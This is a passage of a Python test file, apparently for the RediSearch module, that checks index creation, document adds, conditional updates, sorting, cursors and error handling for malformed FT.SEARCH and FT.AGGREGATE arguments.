extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def testIssue828(env):
env.cmd('ft.create', 'beers', 'ON', 'HASH', 'SCHEMA',
'name', 'TEXT', 'PHONETIC', 'dm:en',
'style', 'TAG', 'SORTABLE',
'abv', 'NUMERIC', 'SORTABLE')
rv = env.cmd("FT.ADD", "beers", "802", "1.0",
"FIELDS", "index", "25", "abv", "0.049",
"name", "Hell or High Watermelon Wheat (2009)",
"style", "Fruit / Vegetable Beer")
env.assertEqual('OK', rv)
def testIssue862(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
rv = env.cmd("FT.ADD", "idx", "doc1", "1.0", "FIELDS", "test", "foo")
env.assertEqual('OK', rv)
env.cmd("FT.SEARCH", "idx", "foo", 'WITHSORTKEYS')
env.assertTrue(env.isUp())
def testIssue_884(env):
env.expect('FT.create', 'idx', 'ON', 'HASH', 'STOPWORDS', '0', 'SCHEMA', 'title', 'text', 'weight',
'50', 'subtitle', 'text', 'weight', '10', 'author', 'text', 'weight',
'10', 'description', 'text', 'weight', '20').equal('OK')
env.expect('FT.ADD', 'idx', 'doc4', '1.0', 'FIELDS', 'title', 'mohsin conversation the conversation tahir').equal('OK')
env.expect('FT.ADD', 'idx', 'doc3', '1.0', 'FIELDS', 'title', 'Fareham Civilization Church - Sermons and conversations mohsin conversation the').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'title', 'conversation the conversation - a drama about conversation, the science of conversation.').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'title', 'mohsin conversation with the mohsin').equal('OK')
expected = [2L, 'doc2', ['title', 'conversation the conversation - a drama about conversation, the science of conversation.'], 'doc4', ['title', 'mohsin conversation the conversation tahir']]
res = env.cmd('FT.SEARCH', 'idx', '@title:(conversation) (@title:(conversation the conversation))=>{$inorder: true;$slop: 0}')
env.assertEquals(len(expected), len(res))
for v in expected:
env.assertContains(v, res)
def testIssue_866(env):
env.expect('ft.sugadd', 'sug', 'test123', '1').equal(1)
env.expect('ft.sugadd', 'sug', 'test456', '1').equal(2)
env.expect('ft.sugdel', 'sug', 'test').equal(0)
env.expect('ft.sugget', 'sug', '').equal(['test123', 'test456'])
def testIssue_848(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test1', 'foo').equal('OK')
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'test2', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'test1', 'foo', 'test2', 'bar').equal('OK')
env.expect('FT.SEARCH', 'idx', 'foo', 'SORTBY', 'test2', 'ASC').equal([2L, 'doc1', ['test1', 'foo'], 'doc2', ['test2', 'bar', 'test1', 'foo']])
def testMod_309(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
for i in range(100000):
env.expect('FT.ADD', 'idx', 'doc%d'%i, '1.0', 'FIELDS', 'test', 'foo').equal('OK')
res = env.cmd('FT.AGGREGATE', 'idx', 'foo')
env.assertEqual(len(res), 100001)
# test with cursor
res = env.cmd('FT.AGGREGATE', 'idx', 'foo', 'WITHCURSOR')
l = len(res[0]) - 1 # do not count the number of results (the first element in the results)
cursor = res[1]
while cursor != 0:
r, cursor = env.cmd('FT.CURSOR', 'READ', 'idx', str(cursor))
l += (len(r) - 1)
env.assertEqual(l, 100000)
def testIssue_865(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', '1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', '1', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', '1', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'ASC').equal([2, 'doc1', ['1', 'foo1'], 'doc2', ['1', 'foo2']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'DESC').equal([2, 'doc2', ['1', 'foo2'], 'doc1', ['1', 'foo1']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY').error()
def testIssue_779(env):
# FT.ADD should return NOADD and leave the doc unchanged when the IF condition 'value < same_value' is false, but it returns OK and applies the change.
# Note that "greater than" (>) does not have the same bug.
env.cmd('FT.CREATE idx2 ON HASH SCHEMA ot1 TAG')
env.cmd('FT.ADD idx2 doc2 1.0 FIELDS newf CAT ot1 4001')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "CAT", "ot1", "4001"]))
# NOADD is expected since 4001 is not < 4000, and no update to doc2 is expected as a result
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4000 FIELDS newf DOG ot1 4000', 'NOADD')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "CAT", "ot1", "4001"]))
# OK is expected since 4001 < 4002 and the doc2 is updated
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf DOG ot1 4002').equal('OK')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "DOG", "ot1", "4002"]))
# OK is NOT expected since 4002 is not < 4002
# We expect NOADD and no update to doc2; the bug was that OK was returned and doc2 was updated
# After the fix, @ot1 is implicitly converted to a number, so we expect NOADD
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if to_number(@ot1)<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_str(4002) FIELDS newf FISH ot1 4002').equal('NOADD')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "DOG", "ot1", "4002"]))
# OK and doc2 update is expected since 4002 < 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4003 FIELDS newf HORSE ot1 4003').equal('OK')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "HORSE", "ot1", "4003"]))
# Expect NOADD since 4003 is not > 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4003 FIELDS newf COW ot1 4003').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if 4003<@ot1 FIELDS newf COW ot1 4003').equal('NOADD')
# Expect OK and doc2 updated since 4003 > 4002
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4002 FIELDS newf PIG ot1 4002').equal('OK')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "PIG", "ot1", "4002"]))
# Syntax errors
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4-002 FIELDS newf DOG ot1 4002').contains('Syntax error')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_number(4-002) FIELDS newf DOG ot1 4002').contains('Syntax error')
def testUnknownSymbolErrorOnConditionalAdd(env):
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TAG f2 NUMERIC NOINDEX f3 TAG NOINDEX').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').error()
def testWrongResultsReturnedBySkipOptimization(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'TEXT', 'f2', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'f1', 'foo', 'f2', 'bar').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'f1', 'moo', 'f2', 'foo').equal('OK')
env.expect('ft.search', 'idx', 'foo @f2:moo').equal([0L])
def testErrorWithApply(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo bar').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'split()')[1]
env.assertEqual(str(err[0]), 'Invalid number of arguments for split')
def testSummerizeWithAggregateRaiseError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', '1', 'test',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0').error()
def testSummerizeHighlightParseError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', 'WITHSCORES').error()
env.expect('ft.search', 'idx', 'foo2', 'HIGHLIGHT', 'FIELDS', 'WITHSCORES').error()
def testCursorBadArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0',
'WITHCURSOR', 'COUNT', 'BAD').error()
def testLimitBadArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'LIMIT', '1').error()
def testOnTimeoutBadArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'bad').error()
def testAggregateSortByWrongArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', 'bad').error()
def testAggregateSortByMaxNumberOfFields(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA',
'test1', 'TEXT', 'SORTABLE',
'test2', 'TEXT', 'SORTABLE',
'test3', 'TEXT', 'SORTABLE',
'test4', 'TEXT', 'SORTABLE',
'test5', 'TEXT', 'SORTABLE',
'test6', 'TEXT', 'SORTABLE',
'test7', 'TEXT', 'SORTABLE',
'test8', 'TEXT', 'SORTABLE',
'test9', 'TEXT', 'SORTABLE'
).equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *['@test%d' % (i + 1) for i in range(9)]).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX', 'bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
def testNumericFilterError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad', '2').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', '2', 'FILTER', 'test', '0', 'bla').error()
def testGeoFilterError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', 'bad' , '2', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , 'bad', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', 'bad', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', '3', 'bad').error()
def testReducerError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as').error()
def testGroupbyError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test1').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'bad', '0').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'SUM', '1', '@test1').error()
def testGroupbyWithSort(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc3', '1.0', 'FIELDS', 'test', '2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '2', '@test', 'ASC',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as', 'count').equal([2L, ['test', '2', 'count', '1'], ['test', '1', 'count', '2']])
def testApplyError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'APPLY', 'split(@test)', 'as').error()
def testLoadError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', '@test').error()
def testMissingArgsError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx').error()
def testUnexistsScorer(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'SCORER', 'bad').error()
def testHighlightWithUnknowsProperty(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'HIGHLIGHT', 'FIELDS', '1', 'test1').error()
def testBadFilterExpression(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', 'blabla').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', '@test1 > 1').error()
def testWithSortKeysOnNoneSortableValue(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHSORTKEYS', 'SORTBY', 'test').equal([1L, 'doc1', '$foo', ['test', 'foo']])
def testWithWithRawIds(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
waitForIndex(env, 'idx')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHRAWIDS').equal([1L, 'doc1', 1L, ['test', 'foo']])
def testUnkownIndex(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('ft.aggregate').error()
env.expect('ft.aggregate', 'idx', '*').error()
env.expect('ft.aggregate', 'idx', '*', 'WITHCURSOR').error()
def testExplainError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('FT.EXPLAIN', 'idx', '(').error()
def testBadCursor(env):
env.expect('FT.CURSOR', 'READ', 'idx').error()
env.expect('FT.CURSOR', 'READ', 'idx', '1111').error()
env.expect('FT.CURSOR', 'READ', 'idx', 'bad').error()
env.expect('FT.CURSOR', 'DROP', 'idx', '1111').error()
env.expect('FT.CURSOR', 'bad', 'idx', '1111').error()
def testGroupByWithApplyError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'APPLY', 'split()', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'AS', 'count')[1]
assertEqualIgnoreCluster(env, str(err[0]), 'Invalid number of arguments for split')
def testSubStrErrors(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a', 'APPLY', 'substr(@a,0,4)')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,-2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,1000)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",-1,2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr(1)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "-1", "-1")', 'as', 'a')
env.assertTrue(env.isUp())
def testToUpperLower(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower("FOO")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper("foo")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testMatchedTerms(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(-100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms("test")', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
def testStrFormatError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%s")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%b", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format(5)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'b', 'APPLY', 'format("%s", @b)', 'as', 'a').equal([1L, ['test', 'foo', 'b', None, 'a', '(null)']])
# working example
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%%s-test", "test")', 'as', 'a').equal([1L, ['a', '%s-test']])
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%s-test", "test")', 'as', 'a').equal([1L, ['a', 'test-test']])
def testTimeFormatError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test1)', 'as', 'a').error()
env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test)', 'as', 'a')
env.assertTrue(env.isUp())
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, 4)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt("awfawf")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
